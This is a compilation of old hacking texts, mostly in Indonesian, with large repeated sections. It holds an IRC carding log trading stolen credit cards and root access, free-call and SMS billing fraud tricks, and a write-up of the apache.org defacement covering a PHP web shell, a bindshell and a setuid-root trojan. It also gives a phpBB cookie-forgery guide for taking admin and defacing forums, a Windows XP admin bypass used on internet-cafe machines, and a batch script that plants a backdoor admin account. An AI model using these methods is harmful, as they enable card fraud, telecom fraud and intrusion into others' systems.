-listen2rap- SL[a]TkiS's command llist iiss as following: !country Country-Name, !state State-Name, !bank cc-Number, !bnc, !order.log, !cardable, !proxy, !unicode, !cvv2 ccNumber - -=. SL[a]TkiS addon version 4.0, get it at www.sthost4u.net/Programs/slatkis_addon_4.0.zip , #DaCc =- <@^Enhance^> ?? Request ?? Info?Auth.net Merchant Account - I have Virgins / Cvv2 / eBay Seller Accounts / Proxy / XXX / Cardable Sites / High Limit CCs -- I Ver. First. NewBs & Ripperz Piss Off? ? ?? ?
*** Joins: ^tyty^ (BaCk0ff@max227.idx.com.au)
*** Quits: ^tyty^ (BaCk0ff@max227.idx.com.au) (Quit: )
* DaLinuX i have root i need cc msg me for trade
!chk 373216942923005 0802
#thacc
*** Now talking in #thacc
*** Topic is 'We are not responsible for any actions that non-op's perform or any actions against DALnet policy that may done at the main chan}}[Type: !commands ] ||GSD's site: www.TheCC.biz || [ Join #CCpower ] [new command by GSD > !phone < only when MR^all' is here] y2y = GSD'
*** Set by GSD on Fri May 03 02:11:11
!proxy
*** Parts: fc4 (~umik_o@203.147.50.12)
*** Joins: fc4 (~umik_o@203.147.50.12)
<^Enhance^> ?? Request ?? Info?Auth.net Merchant Account - I have Virgins / Cvv2 / eBay Seller Accounts / Proxy / XXX / Cardable Sites / High Limit CCs -- I Ver. First. NewBs & Ripperz Piss Off? ? ?? ?
*** Quits: ALICE22 (kozxgy@189.Red-80-34-233.pooles.rima-tde.net) (Quit: IRcap 7.1 http://www.ircap.net !)
*** Quits: ^tyty^ (BaCk0ff@max227.idx.com.au) (Quit: ) !xlogin 373216942923005 0802
*** e_KiNGHT-[Away] is now known as Guest53360
How I can see my card is valid
* DaLinuX i have root i need cc msg me for trade
Jelas ??!
Sekedar saran aja, pakai alamat rumah kontrakan/kost, jadi setelah barang yang didapat sampai, segera kabur dari rumah tersebut, hheeeehe, biar gak dilacak
Tip n Trik Telepon Gratis
I. Trik telphon gratis Lokal (dalam kota)
Fasilitas dan cara yang digunakan:
1. Telphone umum koin yang masih hidup
2. Pencet angka 1551 <--- catatan: angka 1 terakhir di pencet lama hingga ada nada "tut/nit/nada sela lainnya"
3. Bila tanda itu telah bunyi baru tekan nomor yang dituju ( nomor telphone lokal)
4. dan anda akan mendapatkan sambungan langsung dari telkom ke no telp yang dituju, maka anda bisa bicara sepuas bibir anda.
Note: Untuk nomor lokal yang tidak bisa dihubungi biasanya dikarenakan :
1. TERLALU BANYAK NOMOR YANG KEMBAR
2. TERLALU BANYAK ANGKA DOMINAN BESAR MISAL 8997896/89868789/ dll
3. DAN BILA TELEPHONE YANG DITUJU BELUM TERPASANG
4. TELKOM SEDANG KENA TROUBLE :))
II. TRIK TELEPHONE GRATIS INTERLOKAL (LUAR KOTA)
Fasilitas dan cara yang digunakan:
1. Telphone rumah, kantor atau wartel tipe B (sangat dianjurkan)
2. Telponlah seperti kita menelpon biasa ke NOMOR TUJUAN LUAR KOTA (khusus luar kota)
3. Bicaralah sepuas hati dan sebengkak bibir anda
4. Bila telah selesai percakapan ... PERHATIKAN TRIK INI:
TRIK 1. - SEBELUM ANDA MENUTUP TELEPHON, KETIKLAH NOMOR TUJUAN PERSIS SEPERTI NOMOR YANG DITUJU PERTAMA
misal: tujuan 021888555000 -> bila telah selesai ketikan 021888555000 lagi
JANGAN PAKAI TOMBOL RADIAL, KARENA SERING GAGAL
TRIK 2. - SEPERTI CARA TRIK PERTAMA TADI CUMAN KITA RUBAH NOMOR TUJUAN AKHIR
misal: tujuan 021888555000 -> bila telah selesai ketikan 031545552222 (BEDA NOMOR TUJUAN)
JANGAN PAKAI TOMBOL RADIAL, KARENA SERING GAGAL
CATATAN: Hati-hati dalam melakukan aksi ini karena sangat merugikan pihak lain. Jangan sekali-kali gunakan wartel tipe A untuk melakukan trik II telepon gratis keluar kotak karena akan kelihatan pada komputer billing operator dan pasti Anda akan dicurigai karena pulsa akan hilang begitu saja dari layar monitor operator Wartel. Jangan menggunakan trik ini kanare akan merugikan "pihak lain" =))
Fasilitas dan cara yang digunakan:
1. Telphone umum koin yang masih hidup
2. Pencet angka 1551 <--- catatan: angka 1 terakhir di pencet lama hingga ada nada "tut/nit/nada sela lainnya"
3. Bila tanda itu telah bunyi baru tekan nomor yang dituju ( nomor telphone lokal)
4. dan anda akan mendapatkan sambungan langsung dari telkom ke no telp yang dituju, maka anda bisa bicara sepuas bibir anda.
Note: Untuk nomor lokal yang tidak bisa dihubungi biasanya dikarenakan :
1. TERLALU BANYAK NOMOR YANG KEMBAR
2. TERLALU BANYAK ANGKA DOMINAN BESAR MISAL 8997896/89868789/ dll
3. DAN BILA TELEPHONE YANG DITUJU BELUM TERPASANG
4. TELKOM SEDANG KENA TROUBLE :))
II. TRIK TELEPHONE GRATIS INTERLOKAL (LUAR KOTA)
Fasilitas dan cara yang digunakan:
1. Telphone rumah, kantor atau wartel tipe B (sangat dianjurkan)
2. Telponlah seperti kita menelpon biasa ke NOMOR TUJUAN LUAR KOTA (khusus luar kota)
3. Bicaralah sepuas hati dan sebengkak bibir anda
4. Bila telah selesai percakapan ... PERHATIKAN TRIK INI:
TRIK 1. - SEBELUM ANDA MENUTUP TELEPHON, KETIKLAH NOMOR TUJUAN PERSIS SEPERTI NOMOR YANG DITUJU PERTAMA
misal: tujuan 021888555000 -> bila telah selesai ketikan 021888555000 lagi
JANGAN PAKAI TOMBOL RADIAL, KARENA SERING GAGAL
TRIK 2. - SEPERTI CARA TRIK PERTAMA TADI CUMAN KITA RUBAH NOMOR TUJUAN AKHIR
misal: tujuan 021888555000 -> bila telah selesai ketikan 031545552222 (BEDA NOMOR TUJUAN)
JANGAN PAKAI TOMBOL RADIAL, KARENA SERING GAGAL
CATATAN: Hati-hati dalam melakukan aksi ini karena sangat merugikan pihak lain. Jangan sekali-kali gunakan wartel tipe A untuk melakukan trik II telepon gratis keluar kotak karena akan kelihatan pada komputer billing operator dan pasti Anda akan dicurigai karena pulsa akan hilang begitu saja dari layar monitor operator Wartel. Jangan menggunakan trik ini kanare akan merugikan "pihak lain" =))
LINUX
Unix yang seluruh source codenya dibuat dengan bahasa C sangat memudahkan
pengembanganya sehingga dalam waktu singkat Unix dapat berkembang secara
pesat, dan terbentuklah dua aliran : yaitu Unix yang dikembangkan oleh
Universitas Berkeley dan yang dikembangkan AT&T.
Semakin lama semakin banyak perusahaan yang ikut melibatkan diri, sehingga
terjadilah persaingan antar perusahaan untuk memegang kontrol terhadap
sistem operasi.PErsaingan ini menyebabkan perlunya sebuah standar yang baku
sehingga lahirlah proyek bernama 'POSIX' yang di motori oleh IEEE (The
Institute of Electrical and Electronics Engineers) yang akan menetapkan
spesifikasi standar Unix. ternyata, dengan adanya standar tersebut tetap
belum bisa meredakan persaingan yang timbul yang mengakibatkan munculnya
berbagai varian dari Unix.
Source code Minix yang tercipta sebagai salah satu varian Unix dan dibuat
oleh Andy S Tanembaum untuk tujuan pendidikan inilah yang dijadikan Linus
Torvalds sebagai referensi untuk membuat suatu Opeating system yang dapat
bekerja seperti Unix dalam komputer 386. Dalam pembuatan linux , Linus
memakai tool-tool dari Free Software Foundation yang berlicensi GNU. Agar
sistem operasi yang baru dibuatnya utuh , linus juga menambahkan program-
program yang berlicensi GNU. Linux yang dibuat linus sebagai hobi akhirnya
membuahkan versi pertama linux, yaitu linux versi 0.0.1, setelah mengalami
perbaikan pada versi 0.02 dan merupakan linux resmi pertama yang diumumkan
secara luas kepada publik. pada tanggal 5 Oktober 1991 linus menggumumkan
source codenya.
Linux yang pertama dirilis sudahdapat menjalankan shell bash,GNU C compiler
, GNU make, GNU Sed, Compress dll. Proyek linux ini menyita begitu banyak
perhatian seluruh programer di dunia yang akhirnya berpartisipasi untuk
ikut mengembangkan linux.
'Linux' bisa jadi merupakan proyek para hacker yang sangat berharga di
dalam sejarah - serta didistribusikan secara bebas beserta kode sumbernya
keseluruh dunia.
pengembanganya sehingga dalam waktu singkat Unix dapat berkembang secara
pesat, dan terbentuklah dua aliran : yaitu Unix yang dikembangkan oleh
Universitas Berkeley dan yang dikembangkan AT&T.
Semakin lama semakin banyak perusahaan yang ikut melibatkan diri, sehingga
terjadilah persaingan antar perusahaan untuk memegang kontrol terhadap
sistem operasi.PErsaingan ini menyebabkan perlunya sebuah standar yang baku
sehingga lahirlah proyek bernama 'POSIX' yang di motori oleh IEEE (The
Institute of Electrical and Electronics Engineers) yang akan menetapkan
spesifikasi standar Unix. ternyata, dengan adanya standar tersebut tetap
belum bisa meredakan persaingan yang timbul yang mengakibatkan munculnya
berbagai varian dari Unix.
Source code Minix yang tercipta sebagai salah satu varian Unix dan dibuat
oleh Andy S Tanembaum untuk tujuan pendidikan inilah yang dijadikan Linus
Torvalds sebagai referensi untuk membuat suatu Opeating system yang dapat
bekerja seperti Unix dalam komputer 386. Dalam pembuatan linux , Linus
memakai tool-tool dari Free Software Foundation yang berlicensi GNU. Agar
sistem operasi yang baru dibuatnya utuh , linus juga menambahkan program-
program yang berlicensi GNU. Linux yang dibuat linus sebagai hobi akhirnya
membuahkan versi pertama linux, yaitu linux versi 0.0.1, setelah mengalami
perbaikan pada versi 0.02 dan merupakan linux resmi pertama yang diumumkan
secara luas kepada publik. pada tanggal 5 Oktober 1991 linus menggumumkan
source codenya.
Linux yang pertama dirilis sudahdapat menjalankan shell bash,GNU C compiler
, GNU make, GNU Sed, Compress dll. Proyek linux ini menyita begitu banyak
perhatian seluruh programer di dunia yang akhirnya berpartisipasi untuk
ikut mengembangkan linux.
'Linux' bisa jadi merupakan proyek para hacker yang sangat berharga di
dalam sejarah - serta didistribusikan secara bebas beserta kode sumbernya
keseluruh dunia.
BUG SMS Satelindo
Teknologi SMS sekarang ini memang makin marak terlebih lagi dengan keadaan ekonomi yang Berantakan, solusi smslah yang lebih tepat dibanding menelpon yang sangat merobek kantong.
GSM yang menggunakan teknik switching dengan memanfaatkan system base station memungkinkan kita bisa mengirim pesan alphanumeric singkat dari sebuah Handphone ke handphone lain.
oke sampe disini preambule kita akhiri.
Kenapa dengan sms gratis yang dulu pernah populer sekarang telah susah ditemui?, itu pertanyaan yang sangat lazim terlontar dari pikiran kita semua yang mengandalkan sebuah promosi produk yang akhirnya menjadi komersil.
Bug yang saya dapatkan pada akhir bulan ini yaitu sebuah sms gratis dengan memanfaatkan kelemahan pada SATELINDO GSM. kenapa satelindo? nomor yang di keluarkan pihat SATELINDO yang baru dengan nomor seri depan 163***(misal +6281616378**) mempunyai bug yang dapat bermanfaat bagi kita untuk ber SMS gratis dengan sipengguna. Telah dicoba dari Simpati, mentari, proXL, dll tetap bisa dilakukan secara gratis.
cara sebagai berikut:
1. ketik SMS
2. kirim kenomor yang dituju ( misal: +6281616378** - tanpa bintang)
(yang saya dapatkan yaitu buug mentari versi 6163 <- diambil dari kode kartu dan nomor awal dari kartu mentari tersebut)
3. cara tulis nomor yang dituju menjadi 616378** (coba dgn nomor lain bila perlu)
4. tidak menggunakan karakter apapun yang ditambah pada nomor tujuan (karakter bintang hanya untuk menutupi nomor asli yang dituju.
4. dapat kita liat bahwa sms kita terkirim.
5. finish
Dari sana kita bisa lakukan dengan sepuas hati.
GSM yang menggunakan teknik switching dengan memanfaatkan system base station memungkinkan kita bisa mengirim pesan alphanumeric singkat dari sebuah Handphone ke handphone lain.
oke sampe disini preambule kita akhiri.
Kenapa dengan sms gratis yang dulu pernah populer sekarang telah susah ditemui?, itu pertanyaan yang sangat lazim terlontar dari pikiran kita semua yang mengandalkan sebuah promosi produk yang akhirnya menjadi komersil.
Bug yang saya dapatkan pada akhir bulan ini yaitu sebuah sms gratis dengan memanfaatkan kelemahan pada SATELINDO GSM. kenapa satelindo? nomor yang di keluarkan pihat SATELINDO yang baru dengan nomor seri depan 163***(misal +6281616378**) mempunyai bug yang dapat bermanfaat bagi kita untuk ber SMS gratis dengan sipengguna. Telah dicoba dari Simpati, mentari, proXL, dll tetap bisa dilakukan secara gratis.
cara sebagai berikut:
1. ketik SMS
2. kirim kenomor yang dituju ( misal: +6281616378** - tanpa bintang)
(yang saya dapatkan yaitu buug mentari versi 6163 <- diambil dari kode kartu dan nomor awal dari kartu mentari tersebut)
3. cara tulis nomor yang dituju menjadi 616378** (coba dgn nomor lain bila perlu)
4. tidak menggunakan karakter apapun yang ditambah pada nomor tujuan (karakter bintang hanya untuk menutupi nomor asli yang dituju.
4. dapat kita liat bahwa sms kita terkirim.
5. finish
Dari sana kita bisa lakukan dengan sepuas hati.
How To Deface APACHE
/*
* Before you start reading
*/
This paper does _not_ uncover any new vulnerabilities. It points out common
(and slightly less common) configuration errors, which even the people at
apache.org made. This is a general warning. Learn from it. Fix your systems,
so we won't have to :)
/*
* introduction
*/
This paper describes how, over the course of a week, we succeeded in
getting root access to the machine running www.apache.org, and changed
the main page to show a 'Powered by Microsoft BackOffice' logo instead
of the default 'Powered by Apache' logo (the feather). No other changes
were made, except to prevent other (possibly malicious) people getting in.
Note that the problems described in this paper are not apache-related,
these were all config errors (one of 'm straight from BugZilla's README,
but the README had enough warnings so I don't blame the BugZilla developers).
People running apache httpd do not need to start worrying because of
anything uncovered herein.
We hacked www.apache.org because there are a lot of servers running apache
software and if www.apache.org got compromised, somebody could backdoor
the apache server source and end up having lots of owned boxes.
We just couldn't allow this to happen, we secured the main ftproot==wwwroot
thing. While having owned root we just couldnt stand the urge to put that
small logo on it.
/*
* ftproot == wwwroot
* o+w dirs
*/
While searching for the laters apache httpserver to diff it the with
previous version and read that diff file for any options of new buffer
overflows, we got ourselves to ftp://ftp.apache.org. We found a mapping of
the http://www.apache.org on that ftp including world writable directories.
So we wrote a little wuh.php3 including
passthru($cmd);
?>
and uploaded that to one of the world writable directories.
/*
* Our commands executed
*/
Unsurprisingly, 'id' got executed when called like
http://www.apache.org/thatdir/wuh.php3?cmd=id
Next was to upload some bindshell and compile it like calling
http://www.apache.org/thatdir/wuh.php3?cmd=gcc+-o+httpd+httpd.c and then
executing it like calling http://www.apache.org/thatdir/wuh.php3?cmd=./httpd
/*
* The shell
*/
Ofcourse we used a bindshell that first requires ppl to authenticate with
a hardcoded password (:
Now we telnet to port 65533 where we binded that shell and we have local
nobody access, because cgi is running as user nobody.
/*
* The apache.org box
*/
What did we find on apache.org box:
-o=rx /root
-o=rx homedirs
apache.org is a freebsd 3.4 box. We didn't wanted to use any buffer
overflow or some lame exploit, goal was to reach root with only
configuration faults.
/*
* Mysql
*/
After a long search we found out that mysql was
running as user root and was reachable locally. Because apache.org was
running bugzilla which requires a mysql account and has it
username/password plaintext in the bugzilla source it was easy to
get a username/passwd for the mysql database.
We downloaded nportredird and have it set up to accept connections on
port 23306 from our ips and redir them to localhost port 3306 so we could
use our own mysql clients.
/*
* Full mysql access
* use it to create files
*/
Having gained access to port 3306 coming from localhost, using the login
'bugs' (which had full access [as in "all Y's"]), our privs where
elevated substantially. This was mostly due to sloppy reading of the BugZilla
README which _does_ show a quick way to set things up (with all Y's) but
also has lots of security warnings, including "don't run mysqld as root".
Using 'SELECT ... INTO OUTFILE;' we were now able to create files
anywhere, as root. These files were mode 666, and we could not overwrite
anything. Still, this seemed useful.
But what do you do with this ability? No use writing .rhosts files - no
sane rshd will accept a world-writable .rhosts file. Besides, rshd
wasn't running on this box.
/*
* our /root/.tcshrc
*/
Therefore, we decided to perform a trojan-like trick. We used database
'test' and created a one-column table with a 80char textfield. A couple
of inserts and one select later, we had ourselves a /root/.tcshrc with
contents similar to:
#!/bin/sh
cp /bin/sh /tmp/.rootsh
chmod 4755 /tmp/.rootsh
rm -f /root/.tcshrc
/*
* ROOT!!
*/
Quite trivial. Now the wait was for somebody to su -. Luckily, with 9
people legally having root, this didn't take long. The rest is trivial
too - being root the deface was quickly done, but not until after a
short report listing the vulnerabilities and quick fixes was build.
Shortly after the deface, we sent this report to one of the admins.
/*
* Fix that ftproot==wwwroot
*/
Another thing we did before the deface, was creating a file 'ftproot' in
the wwwroot (which was also ftproot), moving 'dist' to 'ftproot/dist'
and changing the ftproot to this new 'ftproot' dir, yielding the
world-writable dirs unexploitable but allowing ftp URLs to continue
working.
/*
* What could have been compromised?
*/
Remember the trojaned tcp_wrappers on ftp.win.tue.nl last year? If we
wanted to, we could have done the same thing to Apache. Edit the source
and have people download trojaned versions. Scary, eh?
/*
* In short:
*/
- ftproot==webroot, worldwritable dirs allowing us to upload and execute
php3 scripts
- mysqld running as root, with a FFULL RIGHTS login without a password.
/*
* Compliments for the Apache admin team
*/
We would like to compliment the Apache admin team on their swift
response when they found out about the deface, and also on their
approach, even calling us 'white hats' (we were at the most 'grey hats'
here, if you ask us).
* Before you start reading
*/
This paper does _not_ uncover any new vulnerabilities. It points out common
(and slightly less common) configuration errors, which even the people at
apache.org made. This is a general warning. Learn from it. Fix your systems,
so we won't have to :)
/*
* introduction
*/
This paper describes how, over the course of a week, we succeeded in
getting root access to the machine running www.apache.org, and changed
the main page to show a 'Powered by Microsoft BackOffice' logo instead
of the default 'Powered by Apache' logo (the feather). No other changes
were made, except to prevent other (possibly malicious) people getting in.
Note that the problems described in this paper are not apache-related,
these were all config errors (one of 'm straight from BugZilla's README,
but the README had enough warnings so I don't blame the BugZilla developers).
People running apache httpd do not need to start worrying because of
anything uncovered herein.
We hacked www.apache.org because there are a lot of servers running apache
software and if www.apache.org got compromised, somebody could backdoor
the apache server source and end up having lots of owned boxes.
We just couldn't allow this to happen, we secured the main ftproot==wwwroot
thing. While having owned root we just couldnt stand the urge to put that
small logo on it.
/*
* ftproot == wwwroot
* o+w dirs
*/
While searching for the laters apache httpserver to diff it the with
previous version and read that diff file for any options of new buffer
overflows, we got ourselves to ftp://ftp.apache.org. We found a mapping of
the http://www.apache.org on that ftp including world writable directories.
So we wrote a little wuh.php3 including
passthru($cmd);
?>
and uploaded that to one of the world writable directories.
/*
* Our commands executed
*/
Unsurprisingly, 'id' got executed when called like
http://www.apache.org/thatdir/wuh.php3?cmd=id
Next was to upload some bindshell and compile it like calling
http://www.apache.org/thatdir/wuh.php3?cmd=gcc+-o+httpd+httpd.c and then
executing it like calling http://www.apache.org/thatdir/wuh.php3?cmd=./httpd
/*
* The shell
*/
Ofcourse we used a bindshell that first requires ppl to authenticate with
a hardcoded password (:
Now we telnet to port 65533 where we binded that shell and we have local
nobody access, because cgi is running as user nobody.
/*
* The apache.org box
*/
What did we find on apache.org box:
-o=rx /root
-o=rx homedirs
apache.org is a freebsd 3.4 box. We didn't wanted to use any buffer
overflow or some lame exploit, goal was to reach root with only
configuration faults.
/*
* Mysql
*/
After a long search we found out that mysql was
running as user root and was reachable locally. Because apache.org was
running bugzilla which requires a mysql account and has it
username/password plaintext in the bugzilla source it was easy to
get a username/passwd for the mysql database.
We downloaded nportredird and have it set up to accept connections on
port 23306 from our ips and redir them to localhost port 3306 so we could
use our own mysql clients.
/*
* Full mysql access
* use it to create files
*/
Having gained access to port 3306 coming from localhost, using the login
'bugs' (which had full access [as in "all Y's"]), our privs where
elevated substantially. This was mostly due to sloppy reading of the BugZilla
README which _does_ show a quick way to set things up (with all Y's) but
also has lots of security warnings, including "don't run mysqld as root".
Using 'SELECT ... INTO OUTFILE;' we were now able to create files
anywhere, as root. These files were mode 666, and we could not overwrite
anything. Still, this seemed useful.
But what do you do with this ability? No use writing .rhosts files - no
sane rshd will accept a world-writable .rhosts file. Besides, rshd
wasn't running on this box.
/*
* our /root/.tcshrc
*/
Therefore, we decided to perform a trojan-like trick. We used database
'test' and created a one-column table with a 80char textfield. A couple
of inserts and one select later, we had ourselves a /root/.tcshrc with
contents similar to:
#!/bin/sh
cp /bin/sh /tmp/.rootsh
chmod 4755 /tmp/.rootsh
rm -f /root/.tcshrc
/*
* ROOT!!
*/
Quite trivial. Now the wait was for somebody to su -. Luckily, with 9
people legally having root, this didn't take long. The rest is trivial
too - being root the deface was quickly done, but not until after a
short report listing the vulnerabilities and quick fixes was build.
Shortly after the deface, we sent this report to one of the admins.
/*
* Fix that ftproot==wwwroot
*/
Another thing we did before the deface, was creating a file 'ftproot' in
the wwwroot (which was also ftproot), moving 'dist' to 'ftproot/dist'
and changing the ftproot to this new 'ftproot' dir, yielding the
world-writable dirs unexploitable but allowing ftp URLs to continue
working.
/*
* What could have been compromised?
*/
Remember the trojaned tcp_wrappers on ftp.win.tue.nl last year? If we
wanted to, we could have done the same thing to Apache. Edit the source
and have people download trojaned versions. Scary, eh?
/*
* In short:
*/
- ftproot==webroot, worldwritable dirs allowing us to upload and execute
php3 scripts
- mysqld running as root, with a FFULL RIGHTS login without a password.
/*
* Compliments for the Apache admin team
*/
We would like to compliment the Apache admin team on their swift
response when they found out about the deface, and also on their
approach, even calling us 'white hats' (we were at the most 'grey hats'
here, if you ask us).
Defacing
Langkah-Langkah Deface PHPBB/PHPBB2 Loser_cs_20
1. Download browser Mozilla FireFox
2. Download pluginnya yg bernama LiveHTTPHeader
download di http://livehttpheaders.mozdev.org/installation.html
cari yg paling baru
3. selanjutnya cari target dengan Uncle Google dgn syntax :
phpBB site:[terserah apa aja]
4. setelah itu buka plugin yg kita download tadi di Tools -> LiveHTTPHeader
5. Ingat, isi LiveHTTPHeader harus kosong
6. buka situs target, dengan begitu LiveHTTPHeader akan mengambil semua cookie yg tercatat di halaman target
7. setelah halaman sukses terbuka ditandai dengan tanda "done" di bawah browser, langkah selanjutnya adalah mengklik LiveHTTPHeader di bagian tengahnya dilanjutkan mengklik opsi Replay..
8. setelah LiveHTTPReplay terbuka liat bagian seperti dibawah ini pada LiveHTTPReplay...
Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=88da2bbdc1a3a789df094d50d91f7e3b
9. Hapus bagian yg belakang setelah tanda semi colon (
Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=88da2bbdc1a3a789df094d50d91f7e3b
\_______________hapus bagian ini_________________/
jadinya akan seperti ini :
Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D
10. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi
11. selanjutnya perhatikan langkah di bawah ini:
Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D
\________hapus bagian ini dan di ganti dengan:
Cookie: phpbb2mysql_data=a:2{s:11:"autologinid";s:32:"602baahpepms74d4cb6f2d012e1e4019";s:6:"userid";s:1:"2";}
12. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi tadi.
13. perhatikan lagi langkah ini:
Cookie: phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"602baahpepms74d4cb6f2d012e1e4019";s:6:"userid";s:1:"2";}
\___________________________bagian ini jg digantilagi_______________________________/
menjadi seperti ini:
Cookie: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
14. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi tadi.
15. selesai, silakan liat halaman target, kalo anda beruntung anda mendapatkan full admin.
Silakan pergi ke bawah halaman dan lihat opsi "Go To Administration Panel" telah muncul
1. Download browser Mozilla FireFox
2. Download pluginnya yg bernama LiveHTTPHeader
download di http://livehttpheaders.mozdev.org/installation.html
cari yg paling baru
3. selanjutnya cari target dengan Uncle Google dgn syntax :
phpBB site:[terserah apa aja]
4. setelah itu buka plugin yg kita download tadi di Tools -> LiveHTTPHeader
5. Ingat, isi LiveHTTPHeader harus kosong
6. buka situs target, dengan begitu LiveHTTPHeader akan mengambil semua cookie yg tercatat di halaman target
7. setelah halaman sukses terbuka ditandai dengan tanda "done" di bawah browser, langkah selanjutnya adalah mengklik LiveHTTPHeader di bagian tengahnya dilanjutkan mengklik opsi Replay..
8. setelah LiveHTTPReplay terbuka liat bagian seperti dibawah ini pada LiveHTTPReplay...
Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=88da2bbdc1a3a789df094d50d91f7e3b
9. Hapus bagian yg belakang setelah tanda semi colon (
Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=88da2bbdc1a3a789df094d50d91f7e3b
\_______________hapus bagian ini_________________/
jadinya akan seperti ini :
Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D
10. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi
11. selanjutnya perhatikan langkah di bawah ini:
Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D
\________hapus bagian ini dan di ganti dengan:
Cookie: phpbb2mysql_data=a:2{s:11:"autologinid";s:32:"602baahpepms74d4cb6f2d012e1e4019";s:6:"userid";s:1:"2";}
12. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi tadi.
13. perhatikan lagi langkah ini:
Cookie: phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"602baahpepms74d4cb6f2d012e1e4019";s:6:"userid";s:1:"2";}
\___________________________bagian ini jg digantilagi_______________________________/
menjadi seperti ini:
Cookie: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
14. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi tadi.
15. selesai, silakan liat halaman target, kalo anda beruntung anda mendapatkan full admin.
Silakan pergi ke bawah halaman dan lihat opsi "Go To Administration Panel" telah muncul
Jebol Password WIN XP
Mohon Maaf jika tulisan saya belepotan. Oke kita lanjut saja......
Pernah seorang teman menanyakan kepada saya, seperti ini...
Saya ndak bisa masuk sebagai administrator dalam komputer saya karena saya lupa
ama passwordnya. Tolong kasi tau dong gemana cara menghacknya...Lalu saya teringat
akan ulah saya yang suka iseng ama yang namanya komputer, hal itu saya lakukan
pada sebuah warnet yang suka membatasi usernya biar tidak bisa menginstal program
aneh.
Hehehehehe... akhirnya saya terpikir untuk menerbitkan tulisan ini karena menurut
saya bisa nambah ilmu buat mereka yang baru mengenal komputer dan windows xp
tentunya.
Oke deh kita lihat langkah-langkahnya satu persatu
eng ing eng.....
Pertama : Hidupkan kompimu (bahasa gaulnya = komputer)
Kedua : Jika sudah, tekan F8. Maka kamu akan di bawa ke mode "safe
mode"
tunggu beberapa menit
Ketiga : Tekan Ctrl + alt + Del Maka akan muncul form Login dan Password
Keempat : Isi login dengan Administrator serta passwordnya terserah anda
pokoknya passwordnya mudah di ingat oleh anda sendiri
Kelima : Jika telah melakukan hal di atas, restart kembali komputer anda
Keenam : Pilihlah start in normaly windows kalo ngga salah heheheh
Ketujuh : Tekan kembali Ctrl + Alt + Del
Kedelapan : Ketikkan nama loginnya Administrator terus password yang baru anda
ubah tadi
Kesembilan : Lihat apa yang terjadi, anda telah menjadi administrator di Kompi anda
Kesepuluh : Selesai......terserah anda mau lakukan apasaja
Semua langkah di atas sudah penulis coba dan hasilnya super manjur dan tidak
tertandingi
Pernah seorang teman menanyakan kepada saya, seperti ini...
Saya ndak bisa masuk sebagai administrator dalam komputer saya karena saya lupa
ama passwordnya. Tolong kasi tau dong gemana cara menghacknya...Lalu saya teringat
akan ulah saya yang suka iseng ama yang namanya komputer, hal itu saya lakukan
pada sebuah warnet yang suka membatasi usernya biar tidak bisa menginstal program
aneh.
Hehehehehe... akhirnya saya terpikir untuk menerbitkan tulisan ini karena menurut
saya bisa nambah ilmu buat mereka yang baru mengenal komputer dan windows xp
tentunya.
Oke deh kita lihat langkah-langkahnya satu persatu
eng ing eng.....
Pertama : Hidupkan kompimu (bahasa gaulnya = komputer)
Kedua : Jika sudah, tekan F8. Maka kamu akan di bawa ke mode "safe
mode"
tunggu beberapa menit
Ketiga : Tekan Ctrl + alt + Del Maka akan muncul form Login dan Password
Keempat : Isi login dengan Administrator serta passwordnya terserah anda
pokoknya passwordnya mudah di ingat oleh anda sendiri
Kelima : Jika telah melakukan hal di atas, restart kembali komputer anda
Keenam : Pilihlah start in normaly windows kalo ngga salah heheheh
Ketujuh : Tekan kembali Ctrl + Alt + Del
Kedelapan : Ketikkan nama loginnya Administrator terus password yang baru anda
ubah tadi
Kesembilan : Lihat apa yang terjadi, anda telah menjadi administrator di Kompi anda
Kesepuluh : Selesai......terserah anda mau lakukan apasaja
Semua langkah di atas sudah penulis coba dan hasilnya super manjur dan tidak
tertandingi
Echo Backdoor
rem *echobackd00r.bat
rem *Maret 2004 - backd00r untuk XP && 2000
rem *dibuat untuk mempermudah menciptakan account admin
rem *Kombinasikan dengan SPLOITS untuk mendapatkan Account admin ex: kaht2
rem *atau masuk ke pc yang masih default dengan disket :P baca eksploits lokal
rem *MULAI.
@echo off
PROMPT $P$G
cls
Color 87
GOto iklan
:setting
rem *ganti USER dan PASS
set USER="backdoor"
set PASS="password"
if %USER%=="backdoor" Goto gagal else GOto proses
:proses
rem *masuk ke perintah tuk nambahin user + passwordnya
net user %USER% %PASS% /add
net localgroup Administrators %USER% /add
net localgroup Users %USER% /delete
cls
echo.
echo Account %USER% dengan password %PASS% telah berhasil di buat!
color 70
EXIT
:iklan
rem * just a banner from me :) , bisa di hilangkan :p
echo.
echo ###############################################################
echo # #
echo # Echobackd00r #
echo # created && tested by y3dips with XP OS #
echo # greetz to :the_day for idea, moby, z3r0byt3,comex, *PUJI #
echo # note: ubah USER dan PASS #
echo # #
echo ###############################################################
echo.
echo tekan ENTER !!!
pause>nul
Goto setting
:gagal
echo.
echo edit file echobackd00r.bat dan ubah USER dan PASSnya
echo.
rem *SELESAI.
rem *created by y3dips : maret 2004 : http://echo.or.id
rem *Maret 2004 - backd00r untuk XP && 2000
rem *dibuat untuk mempermudah menciptakan account admin
rem *Kombinasikan dengan SPLOITS untuk mendapatkan Account admin ex: kaht2
